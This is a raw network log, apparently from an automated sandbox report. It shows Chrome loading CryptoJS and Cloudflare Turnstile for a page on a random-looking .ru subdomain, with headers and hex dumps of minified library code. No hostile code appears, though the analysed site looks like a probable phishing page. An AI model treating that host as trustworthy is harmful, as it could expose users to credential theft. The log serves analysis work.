                                        2025-02-15 19:34:48 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.449749104.17.25.144432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:48 UTC657OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                        Host: cdnjs.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://nr3hz5fbqd.bazefrost.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:34:48 UTC969INHTTP/1.1 200 OK
                                        Date: Sat, 15 Feb 2025 19:34:48 GMT
                                        Content-Type: application/javascript; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Cache-Control: public, max-age=30672000
                                        ETag: W/"61182885-40eb"
                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                        cf-cdnjs-via: cfworker/kv
                                        Cross-Origin-Resource-Policy: cross-origin
                                        Timing-Allow-Origin: *
                                        X-Content-Type-Options: nosniff
                                        CF-Cache-Status: HIT
                                        Age: 2015961
                                        Expires: Thu, 05 Feb 2026 19:34:48 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2Ff%2Bo0Kor5nHxr8%2FRVxcfNSUs%2Bwi1zQYDM%2FiasOxVC6Ds9NNe0cVBLAbFGRF3syDagImNbfVx0V2v2oZ0593QRqrkMDC%2BfsxWyVxDcqUObzphD8HX5gZ3%2FApMne3J%2F5mcSD3kd5F"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                        Strict-Transport-Security: max-age=15780000
                                        Server: cloudflare
                                        CF-RAY: 9127bcc73d0af797-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-02-15 19:34:48 UTC400INData Raw: 37 62 65 30 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                        Data Ascii: 7be0!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                        2025-02-15 19:34:48 UTC1369INData Raw: 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d
                                        Data Ascii: ed"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=
                                        2025-02-15 19:34:48 UTC1369INData Raw: 74 3d 6f 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72
                                        Data Ascii: t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.r
                                        2025-02-15 19:34:48 UTC1369INData Raw: 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76
                                        Data Ascii: tring"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(v
                                        2025-02-15 19:34:48 UTC1369INData Raw: 6e 20 4e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e
                                        Data Ascii: n N(){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>
                                        2025-02-15 19:34:48 UTC1369INData Raw: 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b
                                        Data Ascii: ]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[
                                        2025-02-15 19:34:48 UTC1369INData Raw: 61 79 28 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73
                                        Data Ascii: ay(t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={s
                                        2025-02-15 19:34:48 UTC1369INData Raw: 3b 76 61 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46
                                        Data Ascii: ;var o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEF
                                        2025-02-15 19:34:48 UTC1369INData Raw: 32 39 36 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29
                                        Data Ascii: 296*a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)
                                        2025-02-15 19:34:48 UTC1369INData Raw: 79 2c 32 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c
                                        Data Ascii: y,23,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.449750104.18.95.414432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:48 UTC654OUTGET /turnstile/v0/b/324d0dcf743c/api.js HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://nr3hz5fbqd.bazefrost.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:34:48 UTC471INHTTP/1.1 200 OK
                                        Date: Sat, 15 Feb 2025 19:34:48 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 48139
                                        Connection: close
                                        accept-ranges: bytes
                                        last-modified: Tue, 11 Feb 2025 23:52:12 GMT
                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                        access-control-allow-origin: *
                                        cross-origin-resource-policy: cross-origin
                                        Server: cloudflare
                                        CF-RAY: 9127bccad80a4349-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-02-15 19:34:48 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                        Data Ascii: "use strict";(function(){function Ht(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                        2025-02-15 19:34:48 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                        Data Ascii: e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                        2025-02-15 19:34:48 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 71 74 28 65 29 7c 7c 7a 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 56 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                        Data Ascii: ray$/.test(a))return ot(e,t)}}function Se(e,t){return qt(e)||zt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ve(e,t){var a={label:0,sent:function(){if(l[0
                                        2025-02-15 19:34:48 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var Pe=300030;var We=300031;var j;(fu
                                        2025-02-15 19:34:48 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76
                                        Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ee||(ee={}));var ce;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ce||(ce={}));var Q;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(Q||(Q={}));v
